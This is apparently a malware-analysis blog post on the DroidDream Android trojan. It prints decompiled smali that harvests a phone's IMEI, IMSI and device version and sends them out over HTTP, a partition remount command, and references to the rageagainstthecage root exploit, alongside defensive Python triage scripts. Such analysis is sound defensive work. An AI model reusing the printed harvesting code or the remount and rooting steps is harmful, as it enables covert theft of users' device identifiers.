A new Android Trojan named "DroidDream" was discovered by the mobile security company Lookout Inc. today. The trojan takes a legitimate application, repackages it with malicious code, and the malware writer(s) published the result in Google's official Android Market. More than 50 applications were affected in this way, and the illegally modified ones have now been pulled from the market.

     Using the applications collected from the Google market, other local markets and websites, we did a brief first-pass analysis of the samples we have. More details will be published as the investigation continues.

     At first glance the infected application does not request many permissions, so the user may not notice anything abnormal. For example,

AndroidManifest.xml:
<!-- Only a few privileges are required -->
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.INTERNET" />


        <activity android:name="com.android.root.main">
            <intent-filter>
                <!-- Intercept the launch activity -->
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <service android:name="com.android.root.Setting" android:process=":remote" />
        <service android:name="com.android.root.AlarmReceiver" android:process=":remote2" /> 

     Unpacking the package, we found that some additional code had been added:

smali/jackpal/androidterm:
Exec.smali

smali/com/android/root:
adbRoot$1.smali  adbRoot.smali  AlarmReceiver$1.smali  AlarmReceiver.smali  main.smali  Setting$1.smali  Setting$2.smali  Setting.smali  udevRoot.smali

lib/armeabi:
libandroidterm.so

     It uses JNI, which makes the analysis a bit harder.


Exec.smali -> Exec.java :
package jackpal.androidterm;

import java.io.FileDescriptor;

public class Exec
{
  static
  {
    System.loadLibrary("androidterm"); // loads the JNI library "libandroidterm.so" from lib/armeabi
  }
}


The collection of personal data is implemented in Setting.smali:
Setting.smali:
    .line 306
    .local v1, fm:Ljava/util/Formatter;
    const/4 v2, 0x5

    new-array v2, v2, [Ljava/lang/Object;

    const/4 v3, 0x0

    const-string v4, "502"

    aput-object v4, v2, v3

    const/4 v3, 0x1

    const-string v4, "10028"           # trojan version

    aput-object v4, v2, v3

    const/4 v3, 0x2
    # collect the phone's IMEI
    invoke-static {p1}, Lcom/android/root/adbRoot;->getIMEI(Landroid/content/Context;)Ljava/lang/String;

    move-result-object v4

    aput-object v4, v2, v3

    const/4 v3, 0x3
    # collect the phone's IMSI
    invoke-static {p1}, Lcom/android/root/adbRoot;->getIMSI(Landroid/content/Context;)Ljava/lang/String;

    move-result-object v4

    aput-object v4, v2, v3

    const/4 v3, 0x4

    new-instance v4, Ljava/lang/StringBuilder;

    sget-object v5, Landroid/os/Build;->DEVICE:Ljava/lang/String;

    invoke-static {v5}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;

    move-result-object v5

    invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V

    const-string v5, ":"

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    sget v5, Landroid/os/Build$VERSION;->SDK_INT:I            # collect the Android system (SDK) version

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;

    move-result-object v4

    invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v4

    aput-object v4, v2, v3

    invoke-virtual {v1, v0, v2}, Ljava/util/Formatter;->format(Ljava/lang/String;[Ljava/lang/Object;)Ljava/util/Formatter;
    ....
    .end local v0           #data:Ljava/lang/String;
    invoke-virtual {v0}, Ljava/lang/String;->getBytes()[B

    move-result-object v1

    .line 308
    .local v1, buff:[B
    invoke-static {v1}, Lcom/android/root/adbRoot;->crypt([B)V    # the data is supposed to be encrypted here, but the local copy was not

    .line 311
    new-instance v0, Ljava/net/URL;

    invoke-direct {v0, p0}, Ljava/net/URL;-><init>(Ljava/lang/String;)V

    .line 312
    .local v0, aURL:Ljava/net/URL;
    invoke-virtual {v0}, Ljava/net/URL;->openConnection()Ljava/net/URLConnection;

    move-result-object p0

    .end local p0
    check-cast p0, Ljava/net/HttpURLConnection;

    .line 313
    .local p0, aConnection:Ljava/net/HttpURLConnection;
    const/4 v0, 0x1

    invoke-virtual {p0, v0}, Ljava/net/HttpURLConnection;->setDoOutput(Z)V
    ....

    .line 344
    # writes the log into data/data/droiddream/com.droiddream.lovePositions/shared_prefs/pref_config_setting.xml
    const-string p0, "pref_config_setting"

    const/4 v0, 0x0

    invoke-virtual {p1, p0, v0}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;

    .end local v0           #bao:Ljava/io/ByteArrayOutputStream;
    move-result-object p0

    invoke-interface {p0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;

    move-result-object p0

    .line 345
    .local p0, editor:Landroid/content/SharedPreferences$Editor;
    const-string p1, "done"
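The manifest section and the Setting.smali listing above together show the trojan's pattern: a modest permission set, then wrapper calls that read the IMEI/IMSI and push them over HTTP. The following Python is an added example (not AegisLab's tooling) that correlates a decoded manifest's permissions with the invoke-* instructions found in smali; the manifest and smali strings are constructed samples condensed from the listings above, and the method and class names it keys on are taken from them plus the standard TelephonyManager identifier APIs.

```python
import re
from xml.etree import ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# Constructed sample manifest: the modest permission set quoted above, inside a minimal root element.
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-permission android:name="android.permission.READ_PHONE_STATE" />
  <uses-permission android:name="android.permission.INTERNET" />
</manifest>"""

# Constructed sample smali, condensed from the Setting.smali listing above.
SMALI = """
    invoke-static {p1}, Lcom/android/root/adbRoot;->getIMEI(Landroid/content/Context;)Ljava/lang/String;
    invoke-static {p1}, Lcom/android/root/adbRoot;->getIMSI(Landroid/content/Context;)Ljava/lang/String;
    invoke-static {v1}, Lcom/android/root/adbRoot;->crypt([B)V
    invoke-virtual {v0}, Ljava/net/URL;->openConnection()Ljava/net/URLConnection;
    invoke-virtual {p0, v0}, Ljava/net/HttpURLConnection;->setDoOutput(Z)V
"""

# Matches any invoke-* instruction and captures the target class and method name.
INVOKE_RE = re.compile(r"^\s*invoke-\w+(?:/range)? \{[^}]*\}, (L[\w/$]+;)->(\w+|<init>)\(")
# Method names that return device identifiers: the trojan's wrappers plus the TelephonyManager APIs.
IDENTIFIER_METHODS = {"getIMEI", "getIMSI", "getDeviceId", "getSubscriberId"}
NETWORK_CLASSES = {"Ljava/net/URL;", "Ljava/net/HttpURLConnection;"}

def invoked_methods(smali_text):
    # (class, method) pair for every invoke-* instruction in the smali text
    return [m.groups() for m in map(INVOKE_RE.match, smali_text.splitlines()) if m]

def manifest_permissions(xml_text):
    # android:name of every <uses-permission> element in a decoded manifest
    root = ET.fromstring(xml_text)
    return {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}

def assess(xml_text, smali_text):
    # Correlate the few permissions requested with what the code actually does with them.
    perms = manifest_permissions(xml_text)
    calls = invoked_methods(smali_text)
    harvests_ids = any(meth in IDENTIFIER_METHODS for _, meth in calls)
    talks_network = any(cls in NETWORK_CLASSES for cls, _ in calls)
    encodes = any(meth == "crypt" for _, meth in calls)
    findings = []
    if harvests_ids and "android.permission.READ_PHONE_STATE" in perms:
        findings.append("reads IMEI/IMSI")
    if talks_network and "android.permission.INTERNET" in perms:
        findings.append("opens HTTP connection")
    if harvests_ids and talks_network:
        findings.append("identifier exfiltration" + (" with obfuscated payload" if encodes else ""))
    return findings
```

Pointing it at a real decoded APK means reading AndroidManifest.xml (after apktool decoding) and concatenating the smali tree; the findings list is what a triage rule would alert on.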

    From LogCat, it tries to connect to http://www.umeng.com/app_logs; the whois record for umeng.com points to a registrant in Beijing. The website is a statistics service for applications, which seems harmless at first glance.

    It collects the IMEI, IMSI, SDK version, Android OS version, language, etc., and stores them in /data/data/droiddream/com.droiddream.lovePositions/shared_prefs/mobclick_agent_header_com.droiddream.lovePositions.xml

    In /data/data/droiddream/com.droiddream.lovePositions/files:

remount_data.sh  remount_sys_ro.sh  remount_sys_rw.sh

The remount_xxx.sh scripts remount the partition (here /data) so that the trojan can access files stored there by other applications. The command is similar to the one below.

mount -o remount,rw,nosuid,nodev -t yaffs2 /dev/block/mtdblock1 /data

     It also collects information from /proc and stores it in /data/data/droiddream/com.droiddream.lovePositions/files/proc

     A snippet of /data/data/droiddream/com.droiddream.lovePositions/files/rageagainstthecage is shown in the figure below.

      Checking the file attributes and type of rageagainstthecage, we found:

    Obviously it is an executable file.
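The "check the file attributes and type" step can be repeated over any app's private files directory, since a native executable dropped there is itself a strong signal. This is an added Python example, not AegisLab's tooling: it identifies ELF files by their header, reports the type and machine fields and the owner execute bit, and builds a constructed sample directory whose 20-byte file only mimics the header of an ARM executable (it is not the real rageagainstthecage).

```python
import os
import stat
import struct
import tempfile

ELF_MAGIC = b"\x7fELF"
E_TYPE = {1: "relocatable", 2: "executable", 3: "shared object"}
E_MACHINE = {0x03: "x86", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64"}

def elf_info(path):
    # Returns (type, machine) names for an ELF file, or None for anything else.
    with open(path, "rb") as fh:
        ident = fh.read(16)
        if len(ident) < 16 or ident[:4] != ELF_MAGIC:
            return None
        endian = "<" if ident[5] == 1 else ">"        # EI_DATA: 1 = little endian
        e_type, e_machine = struct.unpack(endian + "HH", fh.read(4))
    return E_TYPE.get(e_type, hex(e_type)), E_MACHINE.get(e_machine, hex(e_machine))

def native_binaries(files_dir):
    # Every ELF file under an app's private files directory, with its type,
    # machine and whether the owner execute bit is set.
    hits = []
    for root, _, names in os.walk(files_dir):
        for name in names:
            path = os.path.join(root, name)
            info = elf_info(path)
            if info is not None:
                executable = bool(os.stat(path).st_mode & stat.S_IXUSR)
                hits.append((name, info[0], info[1], executable))
    return sorted(hits)

def demo():
    # Constructed sample directory: a 20-byte ARM executable header standing in for
    # the real binary, next to a shell script that must not be reported.
    d = tempfile.mkdtemp()
    elf = ELF_MAGIC + bytes([1, 1, 1, 0]) + b"\0" * 8 + struct.pack("<HH", 2, 0x28)
    bin_path = os.path.join(d, "rageagainstthecage")
    with open(bin_path, "wb") as fh:
        fh.write(elf)
    os.chmod(bin_path, 0o755)
    with open(os.path.join(d, "remount_data.sh"), "w") as fh:
        fh.write("#!/system/bin/sh\n")
    return native_binaries(d)

if __name__ == "__main__":
    print(demo())
```

On a device image, run native_binaries() over each /data/data/<package>/files directory pulled from the phone.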

    Inside it, /proc/%d/cmdline is used in the same way as the code at http://hiapk.com/viewthread.php?action=printable&tid=585198, so it should be an attempt to root the system. However, we are not yet sure about the purpose of rooting or the actions taken afterwards; there is a lot of code that still needs further analysis. Stay tuned!

By AegisLab.

Analyzer: Zod Lin